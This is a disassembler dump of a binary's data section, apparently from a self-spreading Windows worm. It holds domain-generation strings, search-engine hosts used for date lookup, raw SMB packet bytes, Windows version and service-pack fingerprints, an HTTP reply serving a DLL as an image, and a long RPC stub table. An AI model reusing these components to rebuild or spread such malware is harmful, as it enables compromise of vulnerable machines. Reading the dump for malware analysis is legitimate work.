aNetsvcs: ; DATA XREF: sub_setup_run_dll32_and_netsvc+F4�o
unicode 0, <netsvcs>,0
; wchar_t asc_9A48B4
asc_9A48B4: ; DATA XREF: sub_setup_run_dll32_and_netsvc+A3�o
unicode 0, < >,0
a_biz db '.biz',0 ; DATA XREF: .text:009BAD8C�o
align 10h
a_info db '.info',0 ; DATA XREF: .text:009BAD88�o
align 4
a_org db '.org',0 ; DATA XREF: .text:009BAD84�o
align 10h
a_net db '.net',0 ; DATA XREF: .text:009BAD80�o
align 4
a_com db '.com',0 ; DATA XREF: .text:009BAD7C�o
align 10h
a_ws db '.ws',0 ; DATA XREF: .text:009BAD78�o
a_cn db '.cn',0 ; DATA XREF: .text:009BAD74�o
a_cc db '.cc',0 ; DATA XREF: .text:off_9BAD70�o
aDec db 'Dec',0 ; DATA XREF: .text:009BAD6C�o
aNov db 'Nov',0 ; DATA XREF: .text:009BAD68�o
aOct db 'Oct',0 ; DATA XREF: .text:009BAD64�o
aSep db 'Sep',0 ; DATA XREF: .text:009BAD60�o
aAug db 'Aug',0 ; DATA XREF: .text:009BAD5C�o
aJul db 'Jul',0 ; DATA XREF: .text:009BAD58�o
aJun db 'Jun',0 ; DATA XREF: .text:009BAD54�o
aMay db 'May',0 ; DATA XREF: .text:009BAD50�o
aApr db 'Apr',0 ; DATA XREF: .text:009BAD4C�o
aMar db 'Mar',0 ; DATA XREF: .text:009BAD48�o
aFeb db 'Feb',0 ; DATA XREF: .text:009BAD44�o
aJan db 'Jan',0 ; DATA XREF: .text:009BAD40�o
aW3_org db 'w3.org',0 ; DATA XREF: .text:009BAD3C�o
align 4
aAsk_com db 'ask.com',0 ; DATA XREF: .text:009BAD38�o
aYahoo_com db 'yahoo.com',0 ; DATA XREF: .text:009BAD30�o
align 4
aGoogle_com db 'google.com',0 ; DATA XREF: .text:009BAD2C�o
align 4
aBaidu_com db 'baidu.com',0 ; DATA XREF: .text:off_9BAD28�o
align 10h
; char Delim[]
Delim db ', ',0 ; DATA XREF: sub_9AEBA1+36�o
align 8
dbl_9A4958 dq 6.26454564e-1 ; DATA XREF: sub_9AED54+A6�r
; char aHttpSSearch?qD[]
aHttpSSearch?qD db 'http://%s/search?q=%d',0 ; DATA XREF: sub_9AEE25+15�o
align 4
stru_9A4978 _msEH <0FFFFFFFFh, offset loc_9AF0DF, offset loc_9AF0E3>
; DATA XREF: sub_domain_names_generation+5�o
align 8
unk_9A4988 db 81h ; ; DATA XREF: sub_9AF52D+5D�o
db 2 dup(0), 44h
aCkfdenecfdeffc db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aCacacacacacaca db ' CACACACACACACACACACACACACACACAAA',0
dd 0
dword_9A49D4 dd 2F000000h, 424D53FFh, 72h, 4 dup(0) ; DATA XREF: sub_9AF52D+A7�o
dd 25C0000h, 0
dd 2000C00h, 4C20544Eh, 2E30204Dh, 3231h
dword_9A4A08 dd 49000000h, 424D53FFh, 73h, 4 dup(0) ; DATA XREF: sub_9AF52D+EF�o
dd 25C0000h, 0
dd 0FF0Dh, 2FFFF00h, 25C00h, 2 dup(0)
dd 1000000h, 0B000000h, 4D000000h, 4C430053h, 544E4549h
dd 0
; char aUnix[]
aUnix db 'unix',0 ; DATA XREF: sub_9AF52D:loc_9AF77C�o
align 10h
; char aWindows4_0[]
aWindows4_0 db 'windows 4.0',0 ; DATA XREF: sub_9AF52D:loc_9AF769�o
; char aWindows5_0[]
aWindows5_0 db 'windows 5.0',0 ; DATA XREF: sub_9AF52D:loc_9AF757�o
; char aWindows5_1[]
aWindows5_1 db 'windows 5.1',0 ; DATA XREF: sub_9AF52D:loc_9AF745�o
; char aServicePack2[]
aServicePack2 db 'service pack 2',0 ; DATA XREF: sub_9AF52D:loc_9AF71B�o
align 4
; char aWindowsServer2[]
aWindowsServer2 db 'windows server 2003',0 ; DATA XREF: sub_9AF52D:loc_9AF6FB�o
; char aServicePack[]
aServicePack db 'service pack',0 ; DATA XREF: sub_9AF52D:loc_9AF6E0�o
; sub_9AF52D:loc_9AF72D�o
align 4
; char aServicePack1[]
aServicePack1 db 'service pack 1',0 ; DATA XREF: sub_9AF52D+19E�o
; sub_9AF52D+1DC�o
align 4
aVista db 'vista',0 ; DATA XREF: sub_9AF52D+188�o
align 10h
stru_9A4AD0 _msEH <0FFFFFFFFh, offset loc_9AF796, offset loc_9AF79A>
; DATA XREF: sub_9AF52D+2�o
dd 676E70h ; DATA XREF: .text:009BADA4�o
aJpeg db 'jpeg',0 ; DATA XREF: .text:009BADA0�o
align 4
dword_9A4AE8 dd 666967h ; DATA XREF: .text:009BAD9C�o
dword_9A4AEC dd 706D62h ; DATA XREF: .text:off_9BAD98�o
; char aHttp1_0200OkPr[]
aHttp1_0200OkPr db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_process_http_request_and_serve_dll_file+2DA�o
db 'Pragma: no-cache',0Dh,0Ah
db 'Content-Length: %u',0Dh,0Ah
db 'Content-Type: image/%s',0Dh,0Ah
db 0Dh,0Ah,0
align 4
; char aMacintosh[]
aMacintosh db 'macintosh',0 ; DATA XREF: sub_process_http_request_and_serve_dll_file+24B�o
align 10h
; char aLinux[]
aLinux db 'linux',0 ; DATA XREF: sub_process_http_request_and_serve_dll_file+23D�o
align 4
; char aLwp[]
aLwp db 'lwp::',0 ; DATA XREF: sub_process_http_request_and_serve_dll_file+22F�o
align 10h
; char aWget[]
aWget db 'wget',0 ; DATA XREF: sub_process_http_request_and_serve_dll_file+221�o
align 4
; char aWindowsNt5_[]
aWindowsNt5_ db 'windows nt 5.',0 ; DATA XREF: sub_process_http_request_and_serve_dll_file+213�o
align 4
; char aUserAgent[]
aUserAgent db 0Dh,0Ah ; DATA XREF: sub_process_http_request_and_serve_dll_file+1E9�o
db 'user-agent:',0
align 4
; char asc_9A4B88[]
asc_9A4B88 db 0Dh,0Ah ; DATA XREF: sub_process_http_request_and_serve_dll_file:loc_9AF9A6�o
db 0Dh,0
; char aGetSHttp[]
aGetSHttp db 'get /%s http/',0 ; DATA XREF: sub_process_http_request_and_serve_dll_file+75�o
align 10h
stru_9A4BA0 _msEH <0FFFFFFFFh, offset loc_9AFBE5, offset loc_9AFBE9>
; DATA XREF: sub_process_http_request_and_serve_dll_file+5�o
align 10h
dword_9A4BB0 dd 44h, 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh, 3, 8A885D04h
; DATA XREF: .text:pStubDescriptor�o
dd 11C91CEBh, 8E89Fh, 6048102Bh, 2, 7 dup(0)
dd 48320000h, 0
dd 180000h, 400024h, 7080647h, 30003h, 0B0000h, 20000h
dd 4011Bh, 4800D6h, 80008h, 0C2150h, 1A0008h, 0E80010h
dd 140070h, 48320008h, 0
dd 140001h, 80008h, 3080547h, 1, 0B0000h, 20000h, 4010Bh
dd 4800EEh, 80008h, 0C2113h, 7000F4h, 80010h, 4832h, 20000h
dd 80010h, 4460008h, 108h, 0
dd 0Bh, 10B0002h, 0EE0004h, 80048h, 700008h, 8000Ch, 4832h
dd 30000h, 24001Ch, 7470040h, 30708h, 3, 0Bh, 0B0002h
dd 20004h, 8011Bh, 48019Ch, 8000Ch, 102150h, 1A0008h, 0E80014h
dd 180070h, 48320008h, 0
dd 180004h, 80008h, 3080647h, 1, 0B0000h, 20000h, 4010Bh
dd 10B00EEh, 0EE0008h, 0C0048h, 21130008h, 1AE0010h, 140070h
dd 48320008h, 0
dd 180005h, 240024h, 5080646h, 10000h, 0B0000h, 20000h
dd 4010Bh, 4800EEh, 80008h, 0C010Bh, 1A01E8h, 0E80010h
dd 140070h, 48320008h, 0
dd 0C0006h, 80000h, 1080346h, 0
dd 0B0000h, 20000h, 4010Bh, 7000EEh, 80008h, 4832h, 70000h
dd 10h, 4460008h, 108h, 0
dd 0Bh, 10B0002h, 0EE0004h, 8010Bh, 7000EEh, 8000Ch, 4832h
dd 80000h, 24001Ch, 7470040h, 30708h, 3, 0Bh, 0B0002h
dd 20004h, 8011Bh, 4802BEh, 8000Ch, 102150h, 1A0008h, 0E80014h
dd 180070h, 48320008h, 0
a@:
dw 9
unicode 0, < $@>
dd 7080847h, 30003h, 0B0000h, 20000h, 4000Bh, 0B0002h
dd 20008h, 0C011Bh, 480350h, 80010h, 142150h, 1A0008h
dd 0E80018h, 1C0070h, 48320008h, 0
dd 14000Ah, 80010h, 3080547h, 1, 0B0000h, 20000h, 40048h
dd 480008h, 80008h, 0C2113h, 700362h, 80010h, 4832h, 0B0000h
dd 8000Ch, 3460008h, 108h, 0
dd 0Bh, 480002h, 80004h, 80070h, 48320008h, 0
dd 20000Ch, 400024h, 7080847h, 60006h, 0B0000h, 20000h
dd 4000Bh, 0B0002h, 20008h, 0C011Bh, 48057Ch, 80010h, 142150h
dd 1A0008h, 0E80018h, 1C0070h, 48320008h, 0
dd 10000Dh, 80000h, 1080446h, 0
dd 0B0000h, 20000h, 4000Bh, 0B0002h, 20008h, 0C0070h, 48320008h
dd 0
dd 14000Eh, 240024h, 5080546h, 30000h, 0B0000h, 20000h
dd 40048h, 10B0008h, 58E0008h, 0C001Ah, 7000E8h, 80010h
dd 4832h, 0F0000h, 240018h, 6470040h, 70708h, 7, 0Bh, 11B0002h
dd 7CC0004h, 80048h, 21500008h, 8000Ch, 10001Ah, 7000E8h
dd 80014h, 4832h, 100000h, 80014h, 5470008h, 30308h, 0
dd 0Bh, 10B0002h, 0EE0004h, 80048h, 21130008h, 7DE000Ch
dd 100070h, 48320008h, 0
dd 180011h, 240024h, 5080646h, 30000h, 0B0000h, 20000h
dd 4010Bh, 4800EEh, 80008h, 0C010Bh, 1A0828h, 0E80010h
dd 140070h, 48320008h, 0
dd 100012h, 80008h, 1080446h, 0
dd 0B0000h, 20000h, 4010Bh, 4800EEh, 80008h, 0C0070h, 48320008h
dd 0
dd 100013h, 80008h, 1080446h, 0
dd 0B0000h, 20000h, 4010Bh, 4800EEh, 80008h, 0C0070h, 48320008h
dd 0
dd 100014h, 240000h, 1080446h, 0
dd 0B0000h, 20000h, 4010Bh, 215000EEh, 80008h, 0C0070h
dd 48320008h, 0
dd 100015h, 80008h, 3080447h, 1, 0B0000h, 20000h, 40048h
dd 21130008h, 8720008h, 0C0070h, 48320008h, 0
dd 140016h, 240024h, 5080546h, 10000h, 0B0000h, 20000h
dd 40048h, 10B0008h, 0BA80008h, 0C001Ah, 7000E8h, 80010h
dd 4832h, 170000h, 2C001Ch, 7470040h, 10708h, 1, 0Bh, 480002h
dd 80004h, 8011Bh, 480D46h, 8000Ch, 102150h, 1A0008h, 0E80014h
dd 180070h, 48320008h, 0
dd 180018h, 840010h, 1080646h, 0
dd 0B0000h, 20000h, 4000Bh, 480002h, 80008h, 0C0048h, 20120008h
dd 0D5A0010h, 140070h, 48320008h, 0
dd 100019h, 80008h, 5080446h, 10000h, 0B0000h, 20000h
dd 40048h, 10B0008h, 0D880008h, 0C0070h, 48320008h, 0
dd 18001Ah, 400024h, 7080647h, 90009h, 0B0000h, 20000h
dd 4011Bh, 480FD0h, 80008h, 0C2150h, 1A0008h, 0E80010h
dd 140070h, 48320008h, 0
dd 10001Bh, 80008h, 5080446h, 10000h, 0B0000h, 20000h
dd 40048h, 10B0008h, 0D880008h, 0C0070h, 48320008h, 0
dd 0C001Ch, 700000h, 1080346h, 0
dd 0B0000h, 20000h, 42012h, 700FDEh, 80008h, 4832h, 1D0000h
dd 100014h, 5460008h, 108h, 0
dd 0Bh, 0B0002h, 20004h, 80048h, 480008h, 8000Ch, 100070h
dd 48320008h, 0
dd 14001Eh, 240008h, 1080546h, 0
dd 0B0000h, 20000h, 4010Bh, 215000EEh, 80008h, 0C0048h
dd 700008h, 80010h
; const unsigned __int8 pFormat
pFormat db 32h ; DATA XREF: sub_9AFF71+8�o
db 48h, 2 dup(0)
dd 1F0000h, 2C0020h, 8470024h, 10308h, 0
dd 0Bh, 10B0002h, 0EE0004h, 80113h, 880FFCh, 1008000Ch
dd 10010Bh, 15800EEh, 80014h, 180048h, 700008h, 8001Ch
; const unsigned __int8 byte_9A52E4
byte_9A52E4 db 32h ; DATA XREF: sub_9AFF93+8�o
db 48h, 2 dup(0)
dd 200000h, 100018h, 6460008h, 108h, 0
dd 0Bh, 10B0002h, 0EE0004h, 8010Bh, 4800EEh, 8000Ch, 100048h
dd 700008h, 80014h, 4832h, 210000h, 100014h, 5460008h
dd 108h, 0
dd 0Bh, 10B0002h, 0EE0004h, 80048h, 480008h, 8000Ch, 100070h
dd 48320008h, 0
dd 1C0022h, 80018h, 3080747h, 1, 0B0000h, 20000h, 4010Bh
dd 11300EEh, 101A0008h, 0C0088h, 481026h, 80010h, 140048h
dd 700008h, 80018h, 4832h, 230000h, 100018h, 6460008h
dd 108h, 0
dd 0Bh, 10B0002h, 0EE0004h, 8010Bh, 4800EEh, 8000Ch, 100048h
dd 700008h, 80014h, 4832h, 240000h, 240018h, 6470040h
dd 70708h, 7, 0Bh, 11B0002h, 7CC0004h, 80048h, 21500008h
dd 8000Ch, 10001Ah, 7000E8h, 80014h, 4832h, 250000h, 80014h
dd 5460040h, 108h, 0
dd 0Bh, 10B0002h, 0EE0004h, 80048h, 1100008h, 1034000Ch
dd 100070h, 48000008h, 0
dd 80026h, 0E030h, 380000h, 2440040h, 108h, 0
dd 118h, 70103Ch, 80004h, 4832h, 270000h, 80018h, 6470008h
dd 10308h, 0
dd 0Bh, 0B0002h, 20004h, 8010Bh, 4800EEh, 8000Ch, 102013h
dd 701040h, 80014h, 4832h, 280000h, 80018h, 6460008h, 508h
dd 1, 0Bh, 0B0002h, 20004h, 8010Bh, 4800EEh, 8000Ch, 10010Bh
dd 700698h, 80014h, 4832h, 290000h, 80010h, 4460008h, 508h
dd 5, 0Bh, 480002h, 80004h, 8010Bh, 70104Ch, 8000Ch, 4832h
dd 2A0000h, 18001Ch, 7460008h, 108h, 0
dd 0Bh, 0B0002h, 20004h, 8000Bh, 480002h, 8000Ch, 100048h
dd 480008h, 80014h, 180070h, 48320008h, 0
dd 0C002Bh, 240000h, 1080346h, 0
dd 0B0000h, 20000h, 42150h, 700008h, 80008h, 4832h, 2C0000h
dd 4C0020h, 8460008h, 508h, 1, 0Bh, 10B0002h, 0EE0004h
dd 8010Ah, 10B107Eh, 0EE000Ch, 10010Bh, 10B00EEh, 10C80014h
dd 180048h, 700008h, 8001Ch, 4832h, 2D0000h, 440010h, 4460008h
dd 108h, 0
dd 0Bh, 10A0002h, 107E0004h, 8010Bh, 7000EEh, 8000Ch, 4832h
dd 2E0000h, 4C0014h, 5460008h, 108h, 0
dd 0Bh, 10A0002h, 107E0004h, 8010Bh, 4800EEh, 8000Ch, 100070h
dd 48320008h, 0
dd 10002Fh, 80044h, 1080446h, 0
dd 0B0000h, 20000h, 4010Ah, 10B107Eh, 0EE0008h, 0C0070h
dd 48320008h, 0
dd 1C0030h, 80054h, 3080747h, 1, 0B0000h, 20000h, 4010Ah
dd 10B107Eh, 0EE0008h, 0C0048h, 480008h, 80010h, 140113h
dd 7010E0h, 80018h, 4832h, 310000h, 4C0014h, 5460008h
dd 108h, 0
dd 0Bh, 10A0002h, 107E0004h, 8010Bh, 4800EEh, 8000Ch, 100070h
dd 48320008h, 0
dd 100032h, 80044h, 1080446h, 0
dd 0B0000h, 20000h, 4010Ah, 10B107Eh, 0EE0008h, 0C0070h
dd 48320008h, 0
a3_0:
unicode 0, <3(\>
dw 8
dd 5080A46h, 10000h, 0B0000h, 20000h, 4010Bh, 4800EEh
dd 80008h, 0C0048h, 10B0008h, 0EE0010h, 14010Ah, 10B107Eh
dd 0EE0018h, 1C010Bh, 4810C8h, 80020h, 240070h, 48320008h
dd 0
dd 0C0034h, 80000h, 7080347h, 10001h, 0B0000h, 20000h
dd 4201Bh, 7010ECh, 80008h, 4832h, 350000h, 80010h, 4460008h
dd 508h, 5, 0Bh, 480002h, 80004h, 8010Bh, 701124h, 8000Ch
dd 2 dup(0)
db 2 dup(0)
word_9A57C2 dw 0 ; DATA XREF: .text:pStubDescriptor�o
dd 5C250812h, 0CE0011h, 8082Bh, 1FFFCh, 40002h, 2, 0A0000h
dd 1, 52h, 380012h, 40316h, 5C465C4Bh, 0
dd 5C250812h, 5B5C085Bh, 4031Bh, 18h, 5C4B0001h, 44948h
dd 10000h, 0
dd 5C250812h, 0CD004C5Bh, 3165BFFh, 5C4B0008h, 45C46h
dd 120004h, 85BFFD0h, 125B08h, 316004Ch, 5C4B0010h, 5C46h
dd 8120000h, 5C465C25h, 80008h, 5C250812h, 808085Bh, 31B5B08h
dd 180010h, 10000h, 49485C4Bh, 10h, 2, 8120000h, 85C25h
dd 8120008h, 4C5B5C25h, 5BFFB900h, 80316h, 5C465C4Bh, 40004h
dd 0FFC80012h, 5B08085Bh, 8031Ah, 0
dd 29004C08h, 0C115BFFh, 8125C08h, 8115C08h, 4115C25h
dd 82B0002h, 80028h, 20001h, 20004h, 0
dd 1000Ah, 80000h, 120000h, 12FF18h, 11FF62h, 82B0082h
dd 0FFFC0008h, 20001h, 20004h, 0
dd 1FEF8h, 40000h, 120000h, 316004Eh, 5C4B0014h, 5C46h
dd 8120000h, 5C465C25h, 80008h, 5C250812h, 808085Bh, 5B5C0808h
dd 14031Bh, 18h, 5C4B0001h, 144948h, 20000h, 0
dd 5C250812h, 80008h, 5C250812h, 0B7004C5Bh, 3165BFFh
dd 5C4B0008h, 45C46h, 120004h, 85BFFC8h, 31A5B08h, 8, 4C080000h
dd 5BFF7500h, 20411h, 28082Bh, 1000Ch, 40002h, 4, 0FF500000h
dd 1, 3EA0010h, 0E0000h, 3EBh, 0FF3Eh, 0FF640012h, 20012h
dd 40315h, 115B08h, 82B0002h, 80028h, 20001h, 40004h, 0
dd 1FF16h, 0FFD60000h, 3EAh, 3EBFFD4h, 0FF040000h, 110000h
dd 82B00ACh, 0FFFC0008h, 20001h, 20004h, 0
dd 1000Ah, 2C0000h, 120000h, 31B0012h, 180004h, 10000h
dd 0FF9E004Ch, 3165B5Ch, 5C4B0008h, 45C46h, 120004h, 85BFFE2h
dd 125B08h, 3160050h, 5C4B001Ch, 145C46h, 8120014h, 5C465C25h
dd 180018h, 5C250812h, 808085Bh, 8080808h, 31B5B5Ch, 18001Ch
dd 10000h, 49485C4Bh, 1Ch, 140002h, 8120014h, 185C25h
dd 8120018h, 4C5B5C25h, 5BFFB500h, 80316h, 5C465C4Bh, 40004h
dd 0FFC80012h, 5B08085Bh, 8031Ah, 0
dd 4B004C08h, 115BFFh, 82B0082h, 0FFFC0008h, 20001h, 20004h
dd 2, 3FF4Eh, 40000h, 120000h, 316004Eh, 5C4B0014h, 0C5C46h
dd 812000Ch, 5C465C25h, 100010h, 5C250812h, 808085Bh, 5B5C0808h
dd 14031Bh, 18h, 5C4B0001h, 144948h, 20000h, 0C000Ch, 5C250812h
dd 100010h, 5C250812h, 0B7004C5Bh, 3165BFFh, 5C4B0008h
dd 45C46h, 120004h, 85BFFC8h, 31A5B08h, 8, 4C080000h, 5BFF7500h
dd 20411h, 28082Bh, 10008h, 40002h, 20002h, 0FE660000h
dd 3, 4, 0FF700012h, 1F80011h, 8082Bh, 1FFFCh, 40002h
dd 5, 0FC8E0000h, 1, 20016h, 740000h, 0Ah, 1F600E6h, 1420000h
dd 120000h, 316004Eh, 5C4B0018h, 5C46h, 8120000h, 5C465C25h
dd 40004h, 5C250812h, 808085Bh, 5B080808h, 18031Bh, 18h
dd 5C4B0001h, 184948h, 20000h, 0
dd 5C250812h, 40004h, 5C250812h, 0B7004C5Bh, 3165BFFh
dd 5C4B0008h, 45C46h, 120004h, 85BFFC8h, 125B08h, 3160062h
dd 5C4B001Ch, 5C46h, 8120000h, 5C465C25h, 40004h, 5C250812h
dd 185C46h, 8120018h, 85B5C25h, 8080808h, 5B5C0808h, 1C031Bh
dd 18h, 5C4B0001h, 1C4948h, 30000h, 0
dd 5C250812h, 40004h, 5C250812h, 180018h, 5C250812h, 0A3004C5Bh
dd 3165BFFh, 5C4B0008h, 45C46h, 120004h, 85BFFC0h, 125B08h
dd 316004Ch, 5C4B0010h, 5C46h, 8120000h, 5C465C25h, 40004h
dd 5C250812h, 808085Bh, 31B5B08h, 180010h, 10000h, 49485C4Bh
dd 10h, 2, 8120000h, 45C25h, 8120004h, 4C5B5C25h, 5BFFB900h
dd 80316h, 5C465C4Bh, 40004h, 0FFC80012h, 5B08085Bh, 740012h
dd 200316h, 5C465C4Bh, 0
dd 5C250812h, 45C46h, 8120004h, 5C465C25h, 180018h, 5C250812h
dd 1C5C46h, 812001Ch, 85B5C25h, 8080808h, 5B080808h, 20031Bh
dd 18h, 5C4B0001h, 204948h, 40000h, 0
dd 5C250812h, 40004h, 5C250812h, 180018h, 5C250812h, 1C001Ch
dd 5C250812h, 91004C5Bh, 3165BFFh, 5C4B0008h, 45C46h, 120004h
dd 85BFFB8h, 31A5B08h, 8, 4C080000h, 5BFDFF00h, 20011h
dd 28082Bh, 10004h, 40002h, 9, 0FB700000h, 1, 2002Eh, 4C0000h
dd 1F6h, 3EC0082h, 0FB580000h, 3EEh, 5DDFC1Ch, 0C40000h
dd 3EDh, 1F5FC10h, 0FB440000h, 120000h, 3160002h, 5C4B000Ch
dd 5C46h, 8120000h, 5C465C25h, 80008h, 5C250812h, 808085Bh
dd 125B5Ch, 3160002h, 5C4B0020h, 5C46h, 8120000h, 5C465C25h
dd 80008h, 5C250812h, 185C46h, 8120018h, 5C465C25h, 1C001Ch
dd 5C250812h, 808085Bh, 8080808h, 125B08h, 1B000Eh, 180001h
dd 10020h, 3165B02h, 5C4B0028h, 5C46h, 8120000h, 5C465C25h
dd 80008h, 5C250812h, 185C46h, 8120018h, 5C465C25h, 1C001Ch
dd 5C250812h, 245C46h, 120024h, 85BFFBEh, 2 dup(8080808h)
dd 125B08h, 1B000Eh, 180001h, 10000h, 3165B02h, 5C4B0008h
dd 45C46h, 120004h, 85BFFE6h, 115B08h, 82B011Eh, 0FFFC0008h
dd 20001h, 50004h, 0
dd 1F964h, 160000h, 2, 1F60052h, 9E0000h, 1F5h, 0F99Ah
dd 2C0012h, 0C031Bh, 18h, 5C4B0001h, 0C4948h, 20000h, 0
dd 5C250812h, 80008h, 5C250812h, 0CF004C5Bh, 3165BFEh
dd 5C4B0008h, 45C46h, 120004h, 85BFFC8h, 125B08h, 31B003Ch
dd 180020h, 10000h, 49485C4Bh, 20h, 4, 8120000h, 85C25h
dd 8120008h, 185C25h, 8120018h, 1C5C25h, 812001Ch, 4C5B5C25h
dd 5BFEA100h, 80316h, 5C465C4Bh, 40004h, 0FFB80012h, 5B08085Bh
dd 440012h, 28031Bh, 18h, 5C4B0001h, 284948h, 50000h, 0
dd 5C250812h, 80008h, 5C250812h, 180018h, 5C250812h, 1C001Ch
dd 5C250812h, 240024h, 0FE880012h, 8F004C5Bh, 3165BFEh
dd 5C4B0008h, 45C46h, 120004h, 85BFFB0h, 31A5B08h, 8, 4C080000h
dd 5BFED900h, 20411h, 28082Bh, 10008h, 40002h, 9, 0F9200000h
dd 1, 2FDDEh, 0FDFC0000h, 1F6h, 3ECFE32h, 0F9080000h, 3EEh
dd 5DDF9CCh, 0FE740000h, 3EDh, 1F5F9C0h, 0F8F40000h, 110000h
dd 82B0002h, 80028h, 20001h, 90004h, 0
dd 1F8D6h, 0FD940000h, 2, 1F6FDB2h, 0FDE80000h, 3ECh, 3EEF8BEh
dd 0F9820000h, 5DDh, 3EDFE2Ah, 0F9760000h, 1F5h, 0F8AAh
dd 20411h, 28082Bh, 10004h, 40002h, 64003Bh, 1600000h
dd 65h, 660172h, 1920000h, 192h, 19301C4h, 2080000h, 1F6h
dd 1F70258h, 26E0000h, 257h, 3ED02A8h, 0F85C0000h, 453h
dd 3F2F920h, 0F91A0000h, 3F8h, 3F9F914h, 0F90E0000h, 3FAh
dd 5DDF908h, 0F9020000h, 5DEh, 5DFF8FCh, 0F8F60000h, 5E2h
dd 5E5F8F0h, 0F8EA0000h, 5E6h, 5E7F8E4h, 0F8DE0000h, 5E8h
dd 5E9F8D8h, 0F8D20000h, 5EAh, 5EBF8CCh, 0F8C60000h, 5ECh
dd 5EEF8C0h, 0F8BA0000h, 5F0h, 5F1F8B4h, 0F8AE0000h, 5F2h
dd 5F3F8A8h, 0F8A20000h, 5F4h, 5F5F89Ch, 0F8960000h, 5F8h
dd 5F9F890h, 0F88A0000h, 5FAh, 5FDF884h, 0F87E0000h, 5FEh
dd 5FFF878h, 0F8720000h, 600h, 601F86Ch, 0F8660000h, 602h
dd 603F860h, 0F85A0000h, 604h, 605F854h, 0F84E0000h, 606h
dd 607F848h, 0F8420000h, 608h, 609F83Ch, 0F8360000h, 60Ah
dd 60BF830h, 0F82A0000h, 60Ch, 60DF824h, 0F81E0000h, 60Eh
dd 610F818h, 0F8120000h, 611h, 612F80Ch, 0F8060000h, 613h
dd 614F800h, 0F7FA0000h, 120000h, 3160002h, 5C4B0008h
dd 45C46h, 8120004h, 85B5C25h, 125B08h, 3160002h, 5C4B0018h
dd 45C46h, 8120004h, 5C465C25h, 140014h, 5C250812h, 808085Bh
dd 5B080808h, 20012h, 340316h, 5C465C4Bh, 40004h, 5C250812h
dd 145C46h, 8120014h, 5C465C25h, 300030h, 5C250812h, 808085Bh
dd 2 dup(8080808h), 5B5C0808h, 20012h, 7C0316h, 5C465C4Bh
dd 0C000Ch, 5C250812h, 1C5C46h, 812001Ch, 5C465C25h, 780078h
dd 5C250812h, 808085Bh, 7 dup(8080808h), 125B5Ch, 3160002h
dd 5C4B0088h, 0C5C46h, 812000Ch, 5C465C25h, 1C001Ch, 5C250812h
dd 785C46h, 8120078h, 5C465C25h, 840084h, 5C250812h, 808085Bh
dd 7 dup(8080808h), 5B080808h, 20012h, 480315h, 4 dup(8080808h)
dd 5B5C0808h, 20012h, 0A80316h, 5C465C4Bh, 480048h, 5C250812h
dd 808085Bh, 9 dup(8080808h), 5B080808h, 20012h, 0E00316h
dd 5C465C4Bh, 480048h, 5C250812h, 808085Bh, 0Dh dup(8080808h)
dd 115B08h, 82B0002h, 40028h, 20001h, 3B0004h, 64h, 65FE2Ah
dd 0FE3C0000h, 66h, 192FE5Ch, 0FE8E0000h, 193h, 1F6FED2h
dd 0FF220000h, 1F7h, 257FF38h, 0FF720000h, 3EDh, 453F526h
dd 0F5EA0000h, 3F2h, 3F8F5E4h, 0F5DE0000h, 3F9h, 3FAF5D8h
dd 0F5D20000h, 5DDh, 5DEF5CCh, 0F5C60000h, 5DFh, 5E2F5C0h
dd 0F5BA0000h, 5E5h, 5E6F5B4h, 0F5AE0000h, 5E7h, 5E8F5A8h
dd 0F5A20000h, 5E9h, 5EAF59Ch, 0F5960000h, 5EBh, 5ECF590h
dd 0F58A0000h, 5EEh, 5F0F584h, 0F57E0000h, 5F1h, 5F2F578h
dd 0F5720000h, 5F3h, 5F4F56Ch, 0F5660000h, 5F5h, 5F8F560h
dd 0F55A0000h, 5F9h, 5FAF554h, 0F54E0000h, 5FDh, 5FEF548h
dd 0F5420000h, 5FFh, 600F53Ch, 0F5360000h, 601h, 602F530h
dd 0F52A0000h, 603h, 604F524h, 0F51E0000h, 605h, 606F518h
dd 0F5120000h, 607h, 608F50Ch, 0F5060000h, 609h, 60AF500h
dd 0F4FA0000h, 60Bh, 60CF4F4h, 0F4EE0000h, 60Dh, 60EF4E8h
dd 0F4E20000h, 610h, 611F4DCh, 0F4D60000h, 612h, 613F4D0h
dd 0F4CA0000h, 614h, 0F4C4h, 2A0011h, 35C29h, 6011Ah, 0
dd 0FFF2004Ch, 1215B5Ch, 180000h, 10000h, 18h, 4C0001h
dd 5B5CFFE0h, 80316h, 5C465C4Bh, 40004h, 0FFDC0012h, 5B08085Bh
dd 21411h, 20012h, 440315h, 4 dup(8080808h), 115B08h, 1B000Eh
dd 180001h, 0Ch, 3165B02h, 5C4B0014h, 45C46h, 8120004h
dd 5C465C25h, 80008h, 0FFDC0012h, 105C46h, 8120010h, 85B5C25h
dd 8080808h, 115B5Ch, 82B021Ah, 0FFFC0008h, 20001h, 40004h
dd 0
dd 10016h, 5A0000h, 2, 300DCh, 1600000h, 120000h, 31B0034h
dd 180014h, 10000h, 49485C4Bh, 14h, 40003h, 8120004h, 85C25h
dd 120008h, 10FF76h, 8120010h, 4C5B5C25h, 5BFF7500h, 80316h
dd 5C465C4Bh, 40004h, 0FFC00012h, 5B08085Bh, 720012h, 180316h
dd 5C465C4Bh, 40004h, 5C250812h, 85C46h, 120008h, 5C46FF36h
dd 100010h, 5C250812h, 145C46h, 8120014h, 85B5C25h, 8080808h
dd 31B5B08h, 180018h, 10000h, 49485C4Bh, 18h, 40004h, 8120004h
dd 85C25h, 120008h, 10FEF6h, 8120010h, 145C25h, 8120014h
dd 4C5B5C25h, 5BFF9300h, 80316h, 5C465C4Bh, 40004h, 0FFB80012h
dd 5B08085Bh, 740012h, 1C0316h, 5C465C4Bh, 40004h, 5C250812h
dd 85C46h, 120008h, 5C46FEAEh, 100010h, 5C250812h, 145C46h
dd 8120014h, 85B5C25h, 8080808h, 5B5C0808h, 1C031Bh, 18h
dd 5C4B0001h, 1C4948h, 40000h, 40004h, 5C250812h, 80008h
dd 0FE6C0012h, 100010h, 5C250812h, 140014h, 5C250812h
dd 91004C5Bh, 3165BFFh, 5C4B0008h, 45C46h, 120004h, 85BFFB8h
dd 125B08h, 1D007Eh, 5B020100h, 1200316h, 5C465C4Bh, 40004h
dd 5C250812h, 85C46h, 120008h, 5C46FE1Eh, 100010h, 5C250812h
dd 145C46h, 8120014h, 85B5C25h, 8080808h, 4C080808h, 5BFFC100h
dd 120031Bh, 18h, 5C4B0001h, 1204948h, 40000h, 40004h
dd 5C250812h, 80008h, 0FDD80012h, 100010h, 5C250812h, 140014h
